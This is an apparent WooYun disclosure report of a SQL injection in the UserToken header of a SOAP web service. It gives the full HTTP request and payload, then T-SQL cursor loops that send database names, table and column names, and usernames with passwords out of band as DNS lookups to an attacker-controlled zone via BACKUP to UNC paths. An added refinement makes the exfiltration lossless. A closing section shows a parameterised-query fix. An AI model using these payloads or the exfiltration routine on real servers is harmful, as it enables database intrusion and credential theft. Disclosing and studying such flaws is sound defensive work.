WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online --- http://drop.zone.ci/
2015-10-30: details sent to the vendor, awaiting the vendor's response.
2015-11-03: vendor confirmed; details disclosed to the vendor only.
2015-11-13: details disclosed to core white hats and domain experts.
2015-11-23: details disclosed to regular white hats.
2015-12-03: details disclosed to intern white hats.
2015-12-18: details disclosed to the public.
Even sqlmap's blind-injection mode could not extract data from this injection, so the data was pulled out of band over DNS instead.
Injection point (the UserToken value in the SOAP AuthHeader):
    POST /DesktopModules/C_Info/WebService/C_InfoService.asmx HTTP/1.1
    Host: **.**.**.**
    Content-Type: text/xml; charset=utf-8
    Content-Length: 586
    SOAPAction: "http://**.**.**.**/GetC_InfoSharedModules"

    <?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance" xmlns:xsd="http://**.**.**.**/2001/XMLSchema" xmlns:soap="http://**.**.**.**/soap/envelope/">
      <soap:Header>
        <AuthHeader xmlns="http://**.**.**.**/">
          <UserToken>aa' and 1=2;; declare @s varchar(800) set @s=cast(0x77616974666f722064656c61792027303a303a313027 as varchar(800)) exec (@s);select 3 --'</UserToken>
        </AuthHeader>
      </soap:Header>
      <soap:Body>
        <GetC_InfoSharedModules xmlns="http://**.**.**.**/" />
      </soap:Body>
    </soap:Envelope>
Payload (the hex literal decodes to waitfor delay '0:0:10', so a response that arrives about ten seconds late confirms that stacked statements run as the database user):
    aa' and 1=2;; declare @s varchar(800) set @s=cast(0x77616974666f722064656c61792027303a303a313027 as varchar(800)) exec (@s);select 3 --'
First run create database temp_cloud; so that BACKUP has a database to point at (the payloads run as a login that is allowed to create databases). Every statement below leaks one value by building it into the hostname of the UNC path handed to BACKUP ... TO DISK: to open \\<host>\a the SQL Server machine has to resolve <host>, so the value shows up as a query in the attacker's DNS log whether or not the backup itself succeeds. Database name, via the db_name(0) function:
    declare @@yukari varchar(800);
    set @@yukari = db_name(0);
    exec('backup log [temp_cloud] to disk=''\\' + @@yukari + '.xxxxx.dnslog.info\a'';');--
Username: the user_name() function. Table names in the current database: INFORMATION_SCHEMA.tables. With a cursor a single injected statement can walk through many rows, so several names are concatenated (the digit 1 is used as a separator, since digits are valid in a hostname) and sent as one DNS label each time the buffer exceeds 50 characters. Note that the length check runs after the name is appended, so one long table name can push a label past the 63-octet DNS limit, and names containing spaces or other characters not allowed in a hostname will not resolve at all; the print statements are only debug output and do nothing inside the injection.
    DECLARE @T VARCHAR(8000), @TS VARCHAR(8000)
    set @TS = ''
    DECLARE Table_Cursor CURSOR FOR
        select TABLE_NAME from INFORMATION_SCHEMA.tables where table_type='BASE TABLE'
    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor INTO @T
    WHILE (@@FETCH_STATUS=0)
    BEGIN
        set @TS = @TS + '1' + @T
        if len(@TS) > 50
        begin
            print @TS
            EXEC('backup database [temp_cloud] to disk=''\\' + @TS + '.xxx.dnslog.info\a'';');
            set @TS = ''
        end
        FETCH NEXT FROM Table_Cursor INTO @T
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor;
    print @TS
    EXEC('backup database [temp_cloud] to disk=''\\' + @TS + '.xxx.dnslog.info\a'';');
Now obtain the column names of the users table (same loop, with the digit 2 as separator):
    DECLARE @C VARCHAR(8000), @CS VARCHAR(8000)
    set @CS = ''
    DECLARE Table_Cursor CURSOR FOR
        select COLUMN_NAME from INFORMATION_SCHEMA.columns where table_name='users'
    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor INTO @C
    WHILE (@@FETCH_STATUS=0)
    BEGIN
        set @CS = @CS + '2' + @C
        if len(@CS) > 50
        begin
            EXEC('backup database [temp_cloud] to disk=''\\' + @CS + '.xxx.dnslog.info\a'';');
            set @CS = ''
        end
        FETCH NEXT FROM Table_Cursor INTO @C
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor;
    EXEC('backup database [temp_cloud] to disk=''\\' + @CS + '.xxxx.dnslog.info\a'';');
Obtain the data from the users table (the digit 4 precedes each username and 1 separates it from the UpdatePassword value, so a label reads 4<user>1<password>4<user>1<password>...):
    DECLARE @N VARCHAR(8000), @P VARCHAR(8000), @T VARCHAR(8000)
    set @T = ''
    DECLARE Table_Cursor CURSOR FOR
        select Username, UpdatePassword from [Users]
    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor INTO @N, @P
    WHILE (@@FETCH_STATUS=0)
    BEGIN
        set @T = @T + '4' + @N + '1' + @P
        if len(@T) > 50
        begin
            EXEC('backup database [temp_cloud] to disk=''\\' + @T + '.xxx.dnslog.info\a'';');
            set @T = ''
        end
        FETCH NEXT FROM Table_Cursor INTO @N, @P
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor;
    EXEC('backup database [temp_cloud] to disk=''\\' + @T + '.xxxx.dnslog.info\a'';');
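The three cursor loops above share one weakness: a value containing a space, a quote or a non-ASCII character, or a batch that grows past 63 characters, produces a hostname that never resolves and the row is silently lost. The following is an added example, not code from the original report, that applies the same cursor-and-BACKUP technique to the users query but hex-encodes each row and splits it into fixed-size labels tagged with a row and part number, so the receiver can reassemble the data from the DNS log. It assumes [temp_cloud] was created as described above, that the attacker owns the placeholder zone xxx.dnslog.info, and SQL Server 2008 or later (hex CONVERT style 2, DECLARE with initialiser).

```sql
-- Added example, not code from the original report: the cursor-and-BACKUP
-- DNS exfiltration from above, generalised so any row survives the trip.
-- Assumptions: [temp_cloud] exists, xxx.dnslog.info is attacker-controlled
-- (placeholder as in the report), target is SQL Server 2008 or later.
DECLARE @zone     VARCHAR(100) = 'xxx.dnslog.info';
DECLARE @maxLabel INT          = 60;   -- a DNS label holds at most 63 octets

-- Stage the rows to exfiltrate. Two NVARCHAR columns cover the users query
-- from the report; widen the table for other queries.
IF OBJECT_ID('tempdb..#rows') IS NOT NULL DROP TABLE #rows;
CREATE TABLE #rows (seq INT IDENTITY(1,1), a NVARCHAR(4000), b NVARCHAR(4000));
INSERT INTO #rows (a, b) SELECT Username, UpdatePassword FROM [Users];

DECLARE @seq INT, @a NVARCHAR(4000), @b NVARCHAR(4000);
DECLARE @hex VARCHAR(MAX), @host VARCHAR(253), @pos INT, @part INT;

DECLARE row_cur CURSOR LOCAL FAST_FORWARD FOR
    SELECT seq, a, b FROM #rows ORDER BY seq;
OPEN row_cur;
FETCH NEXT FROM row_cur INTO @seq, @a, @b;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- Hex-encode "a|b" so spaces, quotes and other characters that are illegal
    -- in a hostname cannot break the lookup. The VARCHAR cast keeps the payload
    -- short; for non-ASCII data encode the NVARCHAR bytes instead (UTF-16LE).
    SET @hex = CONVERT(VARCHAR(MAX),
                       CAST(CAST(ISNULL(@a, N'') + N'|' + ISNULL(@b, N'') AS VARCHAR(MAX)) AS VARBINARY(MAX)),
                       2);
    SET @pos  = 1;
    SET @part = 0;
    WHILE @pos <= LEN(@hex)
    BEGIN
        -- r<row>p<part>.<hex chunk>.<zone>, e.g. r3p0.61646d696e7c31323334.xxx.dnslog.info
        -- ("admin|1234"), so the receiver can order and join the parts per row.
        SET @host = 'r' + CAST(@seq AS VARCHAR(10)) + 'p' + CAST(@part AS VARCHAR(10))
                  + '.' + SUBSTRING(@hex, @pos, @maxLabel) + '.' + @zone;
        -- The backup never has to succeed: resolving the UNC host is the leak.
        BEGIN TRY
            EXEC('backup database [temp_cloud] to disk=''\\' + @host + '\a''');
        END TRY
        BEGIN CATCH
            PRINT 'lookup sent: ' + @host;   -- the share is unreachable; keep going
        END CATCH;
        SET @pos  = @pos + @maxLabel;
        SET @part = @part + 1;
    END
    FETCH NEXT FROM row_cur INTO @seq, @a, @b;
END
CLOSE row_cur;
DEALLOCATE row_cur;
```

Each row costs one DNS query per 60 hex characters (30 bytes of data), so this is slower than the report's raw concatenation but loses nothing; on the receiving side, sort the logged names by row and part number and hex-decode the middle label.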
Result: the username field of the users table.
Fix: use parameterized queries. Pass UserToken to the database as a bound parameter instead of concatenating it into the statement text. The database login used by the application should also be cut down: the steps above only work because it is allowed to create databases and run BACKUP, neither of which a web service needs.
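To make the fix concrete, the following added example (not the vendor's code; the report does not show the service's implementation or its real column names) reconstructs the kind of token lookup behind C_InfoService.asmx that lets the payload above run, and places the parameterised form beside it. It assumes the service validates UserToken against a users table, represented here by a constructed temporary table #Users, and that the lookup is built as dynamic T-SQL.

```sql
-- Added example, not the vendor's code. Assumptions: UserToken is checked
-- against a users table (#Users is a constructed stand-in) and the query is
-- built by string concatenation; the real code is not shown in the report.
CREATE TABLE #Users (Username NVARCHAR(50), UserToken NVARCHAR(200));
INSERT INTO #Users VALUES (N'admin', N'c0ffee');

-- The exact payload from the report, as the literal the web service receives.
DECLARE @UserToken NVARCHAR(1000) =
    N'aa'' and 1=2;; declare @s varchar(800) set @s=cast(0x77616974666f722064656c61792027303a303a313027 as varchar(800)) exec (@s);select 3 --''';

-- Vulnerable: the value is spliced into the statement text, so the first quote
-- closes the literal and everything after it is parsed as T-SQL. Running this
-- pauses for ten seconds (waitfor delay '0:0:10') and returns an extra result set.
DECLARE @sql NVARCHAR(MAX);
SET @sql = N'SELECT COUNT(*) FROM #Users WHERE UserToken = ''' + @UserToken + N'''';
PRINT @sql;      -- shows the injected statement as the server sees it
EXEC (@sql);

-- Fixed: the value travels as a bound parameter. The statement text is constant,
-- the quote and the stacked statements are just characters compared against
-- UserToken, and the query returns 0 immediately with no delay.
EXEC sp_executesql
    N'SELECT COUNT(*) FROM #Users WHERE UserToken = @tok',
    N'@tok NVARCHAR(1000)',
    @tok = @UserToken;

DROP TABLE #Users;
```

In the ASP.NET code behind the .asmx the same change is SqlParameter on the SqlCommand instead of string concatenation; the principle is identical: the token must reach the server as data, never as part of the statement text.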
Severity: High
Vulnerability rank: 10
Confirmed: 2015-11-03 15:03
CNVD confirmed and reproduced the reported issue and has notified the site's operating organization through the contact details published on the website.
Vendor reply: none yet.